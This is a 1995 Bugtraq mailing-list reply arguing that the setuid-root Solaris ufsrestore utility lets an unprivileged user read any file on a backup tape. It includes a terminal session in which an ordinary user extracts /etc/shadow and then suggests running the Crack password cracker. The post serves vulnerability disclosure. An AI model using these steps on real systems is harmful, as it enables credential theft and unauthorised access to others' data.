Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: ufsrestore suid root not a security hole

From: esilva () NETCOM COM (Eduardo E. Silva)
Date: Tue, 12 Dec 1995 00:39:30 -0800

Sean Vickery wrote:


On 14 November 1995, Brett Lymn wrote:

According to Jake Luck:


yeah, but what about /usr/sbin/ufsrestore ?

it is statically linked, utilizes syslog, and suid root.



If you are a BOFH then just kill the setuid bit on ufsrestore.  It
means that root has to do the restores but it does close an awful lot
of holes (like someone dragging in a QIC and restoring their favourite
version of /etc/passwd.... need I say more?).  Or you could just
remove the global rx though this may bugger up remote root users.


Yes, /usr/sbin/ufsrestore is suid root on my Solaris 2 box.  But it is more
careful than to allow an unprivileged user create or overwrite files just
anywhere.


        BUT, it will let you read ANY file from the tape. Including
        root owned files such as /etc/shadow.

        * Know when UNIX admins runs backups.
        * Extract files with ufsrestore (/etc/shadow)
        * Run Crack.
        * Or you could be reading root's mail, CEO email ...etc,etc
$ pwd
/home/esilva/ED_SILVA
$ date
Mon Dec 11 19:33:13 PST 1995
$ /usr/ucb/whoami
esilva
$ mt -f /dev/rmt/0 status
Exabyte EXB-8500 8mm tape drive:
   sense key(0x0)= No Additional Sense   residual= 0   retries= 0
   file no= 0   block no= 0
$ mt -f /dev/rmt/0 rewind
$ pwd
/home/esilva/ED_SILVA
$ ufsrestore -i /dev/rmt/0cn
ufsrestore >
ufsrestore > ls
.:
 .rhosts       .sh_history   devices/      etc/

ufsrestore > cd etc
ufsrestore > add shadow
ufsrestore > extract
You have not read any volumes yet.
Unless you know which volume your file(s) are on you should start
with the last volume and work towards the first.
Specify next volume #: 1
set owner/mode for '.'? [yn] y
ufsrestore > quit
$ pwd
/home/esilva/ED_SILVA
$ cd etc
$ ls -la
total 8
drwxrwxr-x   2 esilva   other        512 Dec 11 19:54 .
drwxr-xr-x   3 esilva   other        512 Oct 11 21:48 ..
-r--------   1 esilva   other       1144 Oct  9 09:21 shadow.1.la

Now run crack...

--

Thanks!

-Ed                                   _
                                    /\o/\
                                   / <_> \
                                  /^^/ \^^\
                                    /___\
    +---------------------------------------------------------------------+
    |                    Can you see them all around us?                  |
    +---------------------------------------------------------------------+
    |                         esilva () netcom com                           |
    +---------------------------------------------------------------------+
Previous By Date Next
Previous By Thread Next

Current thread: